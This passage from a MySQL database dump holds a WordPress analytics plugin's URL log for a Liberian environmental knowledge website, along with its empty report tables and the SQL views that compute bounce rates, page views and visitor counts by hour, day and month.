2006','e028d59ea8f34802','https://','ekmsliberia.info/document/ministry-of-agriculture-annual-report-2006',0,0),(85,NULL,'Ministry of Agriculture ANNUAL REPORT 2006','75ac69ee7b956fb2','https://','ekmsliberia.info/wp-content/uploads/2020/07/2006-MOA-Annual-Report_1.pdf',0,0),(86,1608,'Ministry of Mines and Energy','86c4e61c66398031','https://','ekmsliberia.info/institution/ministry-of-mines-and-energy',0,0),(87,NULL,'Ministry of Mines and Energy','46fa74f88b196242','https://','ekmsliberia.info/institution/ministry-of-mines-and-energy/#',0,0),(88,3275,'Overview of The UNCCD, and Implementation in Liberia','37ce4a95064ae406','https://','ekmsliberia.info/document/overview-of-the-unccd-and-implementation-in-liberia',0,0),(89,2804,'FDA Boss Wants Forest Rangers Armed','96a5ee1cd34f0074','https://','ekmsliberia.info/fda-boss-wants-forest-rangers-armed',0,0),(90,NULL,'FDA Boss Wants Forest Rangers Armed','e7cf66282c8aea47','http://','lima.gov.lr',0,0),(91,3261,'A Perspective of the Convention on Migratory Species( CMS)','eb1a440b54c5fe11','https://','ekmsliberia.info/document/a-perspective-of-the-convention-on-migratory-species-cms',0,0),(92,3673,'REFRENCE NO: TOR/CCCD/EPA-2021-003, Prepare a Training Programme and Curriculum for The Use of The EKMS Post Project Trainings','93116380dfc5aa4b','https://','ekmsliberia.info/ekms-bulletin/refrence-no-tor-cccd-epa-2021-003-prepare-a-training-programme-and-curriculum-for-the-use-of-the-ekms-post-project-trainings',0,0),(93,1604,'Liberia National Bureau of Concessions','250a8c6789de976b','https://','ekmsliberia.info/institution/liberia-national-bureau-of-concessions',0,0),(94,484,'Education and Youth','5f7c6e124e489e5c','https://','ekmsliberia.info/related-topic/education-and-youth',0,0),(95,1870,'United Nations Convention on Biological Diversity','c8c5f3f605ab17d3','https://','ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity',0,0),(96,NULL,'United Nations Convention on Biological Diversity','462ca84df5fbf2e0','http://','vluv.olwoq.com',0,0),(97,NULL,'United Nations Convention on Biological Diversity','6fc5a9c989a7979f','https://','ekmsliberia.info/wp-content/uploads/2019/11/Title_Registration_Report_Last.pdf',0,0),(98,NULL,'United Nations Convention on Biological Diversity','080fd16dedb79906','https://','ekmsliberia.info/institution/ministry-of-transport/#',0,0),(99,NULL,'United Nations Convention on Biological Diversity','a4a289f99b6d718b','https://','ekmsliberia.info/wp-content/uploads/2019/11/2010_County_Consultation_on_Land.pdf',0,0),(100,2248,'State of the Environment','7de8ba6021982b40','https://','ekmsliberia.info/document/state-of-the-environment',0,0),(101,30,'Custom Header','e5342cac31e4dbd6','http://','localhost/ekms/?oceanwp_library=custom-header&elementor-preview=30&ver=1629078675',0,0),(102,9,'Custom Header','348cfc85e1d65a10','http://','localhost/ekms/?oceanwp_library=custom-header&elementor-preview=30&ver=1629078675#',0,0),(103,9,'Site-header','ce3a6b9fff58f43a','http://','localhost/ekms/?post_type=elementor_library&p=3800&elementor-preview=3800&ver=1629113127',0,0),(104,9,'Site-header','e19df5bea2b62205','http://','localhost/ekms/wp-admin',0,0),(105,9,'Site-footer','bcffd8923ddb1b34','http://','localhost/ekms/?post_type=elementor_library&p=3805&elementor-preview=3805&ver=1629114406',0,0),(106,9,'Site-footer','3eba99c7f8fe3891','http://','localhost/ekms',0,0),(107,9,'Site-footer','7974bcf2c7bce653','http://','localhost/ekms/wp-admin/customize.php?url=localhost/ekms',0,0),(108,68,'Site-footer','9c5d2f2d334bae92','http://','localhost/ekms/about',0,0),(109,76,'Country Profile','64ea7d6011dba2e4','http://','localhost/ekms/country-profile',0,0),(110,76,'Country Profile – Official Website of the Environmental Knowledge Management System','671b2c48f2f2d772','http://','localhost/ekms/country-profile/?elementor-preview=76&ver=1629198883',NULL,NULL),(111,335,NULL,'26b0b77cf2ae9ad8','http://','localhost/ekms/frequently-asked-questions',6,0),(112,NULL,NULL,'ef425202e4eedd0d','http://','localhost/ekms/news-and-blogs',0,0),(113,NULL,NULL,'18aeea5abdcb7c86','http://','localhost/ekms/news-and-blogs/?customize_changeset_uuid=2c145fd6-32ae-464b-8c4d-1a32b6263a5f&customize_messenger_channel=preview-0',0,0),(114,3834,'Document-loop – Official Website of the Environmental Knowledge Management System','d89d35fca286f1d7','http://','localhost/ekms/?post_type=elementor_library&p=3834&elementor-preview=3834&ver=1629201727',NULL,NULL),(115,NULL,NULL,'39516bc46063c3b2','http://','localhost/ekms/documents-database',0,4),(116,NULL,NULL,'3edc1109e1b0b6ad','http://','localhost/ekms/documents-database/2',0,4),(117,NULL,NULL,'e7cdc22b9ed4079f','http://','localhost/ekms/resource-category/project-document',0,0),(118,3099,NULL,'3cbbe55e31026e61','http://','localhost/ekms/document/republic-of-liberia-technology-needs-assessment-report',0,0);
/*!40000 ALTER TABLE `wp_wsm_url_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_visitorInfo`
--

DROP TABLE IF EXISTS `wp_wsm_visitorInfo`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_visitorInfo`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_visitorInfo` AS SELECT 
 1 AS `visitId`,
 1 AS `userId`,
 1 AS `serverTime`,
 1 AS `visitLastActionTime`,
 1 AS `urlId`,
 1 AS `hits`,
 1 AS `title`,
 1 AS `url`,
 1 AS `refUrl`,
 1 AS `visitorId`,
 1 AS `ipAddress`,
 1 AS `city`,
 1 AS `alpha2Code`,
 1 AS `country`,
 1 AS `deviceType`,
 1 AS `browser`,
 1 AS `osystem`,
 1 AS `latitude`,
 1 AS `longitude`,
 1 AS `resolution`,
 1 AS `searchEngine`,
 1 AS `toolBar`*/;
SET character_set_client = @saved_cs_client;

--
-- Temporary table structure for view `wp_wsm_visitorinfo`
--

DROP TABLE IF EXISTS `wp_wsm_visitorinfo`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_visitorinfo`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_visitorinfo` AS SELECT 
 1 AS `visitId`,
 1 AS `userId`,
 1 AS `serverTime`,
 1 AS `visitLastActionTime`,
 1 AS `urlId`,
 1 AS `hits`,
 1 AS `title`,
 1 AS `url`,
 1 AS `refUrl`,
 1 AS `visitorId`,
 1 AS `ipAddress`,
 1 AS `city`,
 1 AS `alpha2Code`,
 1 AS `country`,
 1 AS `deviceType`,
 1 AS `browser`,
 1 AS `osystem`,
 1 AS `latitude`,
 1 AS `longitude`,
 1 AS `resolution`,
 1 AS `searchEngine`,
 1 AS `toolBar`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_yearlyMonthlyReport`
--

DROP TABLE IF EXISTS `wp_wsm_yearlyMonthlyReport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_yearlyMonthlyReport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportYear` varchar(10) NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_yearlyMonthlyReport`
--

LOCK TABLES `wp_wsm_yearlyMonthlyReport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_yearlyMonthlyReport` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_yearlyMonthlyReport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_yearlymonthlyreport`
--

DROP TABLE IF EXISTS `wp_wsm_yearlymonthlyreport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_yearlymonthlyreport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportYear` varchar(10) NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_yearlymonthlyreport`
--

LOCK TABLES `wp_wsm_yearlymonthlyreport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_yearlymonthlyreport` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_yearlymonthlyreport` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_yearwise_report`
--

DROP TABLE IF EXISTS `wp_wsm_yearwise_report`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_yearwise_report` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `normal` int(2) NOT NULL DEFAULT '0',
  `hour` int(2) NOT NULL DEFAULT '0',
  `search_engine` varchar(255) NOT NULL DEFAULT '',
  `browser` int(2) NOT NULL DEFAULT '0',
  `screen` int(2) NOT NULL DEFAULT '0',
  `country` int(3) NOT NULL DEFAULT '0',
  `city` varchar(255) NOT NULL DEFAULT '',
  `operating_system` int(2) NOT NULL DEFAULT '0',
  `url_id` int(11) NOT NULL DEFAULT '0',
  `total_page_views` int(11) NOT NULL DEFAULT '0',
  `total_visitors` int(11) NOT NULL DEFAULT '0',
  `total_first_time_visitors` int(11) NOT NULL DEFAULT '0',
  `total_bounce` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_yearwise_report`
--

LOCK TABLES `wp_wsm_yearwise_report` WRITE;
/*!40000 ALTER TABLE `wp_wsm_yearwise_report` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wsm_yearwise_report` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Final view structure for view `wp_wsm_bounceVisits`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_bounceVisits`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_bounceVisits` AS select `wp_wsm_pageViews`.`visitId` AS `visitId`,`wp_wsm_pageViews`.`visitLastActionTime` AS `visitLastActionTime` from `wp_wsm_pageViews` group by `wp_wsm_pageViews`.`visitId` having (count(`wp_wsm_pageViews`.`URLId`) = 1) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_dateWiseBounce`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseBounce`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_dateWiseBounce` AS select date_format(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') AS `recordDate`,count(0) AS `bounce` from `wp_wsm_bounceVisits` group by date_format(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_dateWiseBounceRate`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseBounceRate`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_dateWiseBounceRate` AS select `dwb`.`recordDate` AS `recordDate`,`dwb`.`bounce` AS `bounce`,`dwp`.`pageViews` AS `pageViews`,`dwv`.`visitors` AS `visitors`,((`dwb`.`bounce` / `dwp`.`pageViews`) * 100) AS `bRatePageViews`,((`dwb`.`bounce` / `dwv`.`visitors`) * 100) AS `bRateVisitors` from ((`wp_wsm_dateWiseBounce` `dwb` left join `wp_wsm_dateWisePageViews` `dwp` on((`dwb`.`recordDate` = `dwp`.`recordDate`))) left join `wp_wsm_dateWiseVisitors` `dwv` on((`dwb`.`recordDate` = `dwv`.`recordDate`))) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_dateWiseFirstVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseFirstVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_dateWiseFirstVisitors` AS select date_format(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00'),'%Y-%m-%d') AS `recordDate`,count(`wp_wsm_uniqueVisitors`.`visitorId`) AS `visitors` from `wp_wsm_uniqueVisitors` group by date_format(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00'),'%Y-%m-%d') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_dateWisePageViews`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWisePageViews`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_dateWisePageViews` AS select date_format(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') AS `recordDate`,sum(`wp_wsm_pageViews`.`totalViews`) AS `pageViews` from `wp_wsm_pageViews` group by date_format(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_dateWiseVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_dateWiseVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_dateWiseVisitors` AS select date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') AS `recordDate`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` group by date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_datewisevisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_datewisevisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_datewisevisitors` AS select date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') AS `recordDate`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` group by date_format(convert_tz(`wp_wsm_logUniqueVisit`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-%d') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourWiseBounce`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseBounce`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourWiseBounce` AS select hour(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00')) AS `hour`,count(0) AS `bounce` from `wp_wsm_bounceVisits` where (convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00') >= '2021-08-17 00:00:00') group by hour(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00')) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourWiseBounceRate`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseBounceRate`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourWiseBounceRate` AS select `hwb`.`hour` AS `hour`,`hwb`.`bounce` AS `bounce`,`hwp`.`pageViews` AS `pageViews`,`hwv`.`visitors` AS `visitors`,((`hwb`.`bounce` / `hwp`.`pageViews`) * 100) AS `bRatePageViews`,((`hwb`.`bounce` / `hwv`.`visitors`) * 100) AS `bRateVisitors` from ((`wp_wsm_hourWiseBounce` `hwb` left join `wp_wsm_hourWisePageViews` `hwp` on((`hwb`.`hour` = `hwp`.`hour`))) left join `wp_wsm_hourWiseVisitors` `hwv` on((`hwb`.`hour` = `hwv`.`hour`))) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourWiseFirstVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseFirstVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourWiseFirstVisitors` AS select hour(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00')) AS `hour`,count(0) AS `visitors` from `wp_wsm_uniqueVisitors` where (convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00') >= '2021-08-17 00:00:00') group by hour(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00')) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourWisePageViews`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWisePageViews`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourWisePageViews` AS select hour(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00')) AS `hour`,sum(`wp_wsm_pageViews`.`totalViews`) AS `pageViews` from `wp_wsm_pageViews` where (convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00') >= '2021-08-17 00:00:00') group by hour(convert_tz(`wp_wsm_pageViews`.`visitLastActionTime`,'+00:00','+01:00')) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourWiseVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourWiseVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourWiseVisitors` AS select hour(convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00')) AS `hour`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` where (convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00') >= '2021-08-17 00:00:00') group by hour(convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00')) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_hourwisevisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_hourwisevisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_hourwisevisitors` AS select hour(convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00')) AS `hour`,count(0) AS `visitors` from `wp_wsm_logUniqueVisit` where (convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00') >= '2021-08-17 00:00:00') group by hour(convert_tz(`wp_wsm_logUniqueVisit`.`firstActionVisitTime`,'+00:00','+01:00')) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthWiseBounce`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseBounce`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthWiseBounce` AS select date_format(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m') AS `recordMonth`,count(0) AS `bounce` from `wp_wsm_bounceVisits` group by date_format(convert_tz(`wp_wsm_bounceVisits`.`visitLastActionTime`,'+00:00','+01:00'),'%Y-%m-') */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthWiseBounceRate`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseBounceRate`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthWiseBounceRate` AS select `mwb`.`recordMonth` AS `recordMonth`,`mwb`.`bounce` AS `bounce`,`mwp`.`pageViews` AS `pageViews`,`mwv`.`visitors` AS `visitors`,((`mwb`.`bounce` / `mwp`.`pageViews`) * 100) AS `bRatePageViews`,((`mwb`.`bounce` / `mwv`.`visitors`) * 100) AS `bRateVisitors` from ((`wp_wsm_monthWiseBounce` `mwb` left join `wp_wsm_monthWisePageViews` `mwp` on((`mwb`.`recordMonth` = `mwp`.`recordMonth`))) left join `wp_wsm_monthWiseVisitors` `mwv` on((`mwb`.`recordMonth` = `mwv`.`recordMonth`))) */;
/*!50001 SET character_set_client      = @saved_cs_client */;
/*!50001 SET character_set_results     = @saved_cs_results */;
/*!50001 SET collation_connection      = @saved_col_connection */;

--
-- Final view structure for view `wp_wsm_monthWiseFirstVisitors`
--

/*!50001 DROP VIEW IF EXISTS `wp_wsm_monthWiseFirstVisitors`*/;
/*!50001 SET @saved_cs_client          = @@character_set_client */;
/*!50001 SET @saved_cs_results         = @@character_set_results */;
/*!50001 SET @saved_col_connection     = @@collation_connection */;
/*!50001 SET character_set_client      = utf8mb4 */;
/*!50001 SET character_set_results     = utf8mb4 */;
/*!50001 SET collation_connection      = utf8mb4_unicode_520_ci */;
/*!50001 CREATE ALGORITHM=UNDEFINED */
/*!50013 DEFINER=`ekmslib_adm`@`localhost` SQL SECURITY DEFINER */
/*!50001 VIEW `wp_wsm_monthWiseFirstVisitors` AS select date_format(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00'),'%Y-%m') AS `recordMonth`,count(`wp_wsm_uniqueVisitors`.`visitorId`) AS `visitors` from `wp_wsm_uniqueVisitors` group by date_format(convert_tz(`wp_wsm_uniqueVisitors`.`firstVisitTime`,'+00:00','+01:00'),'%Y-%m') */;
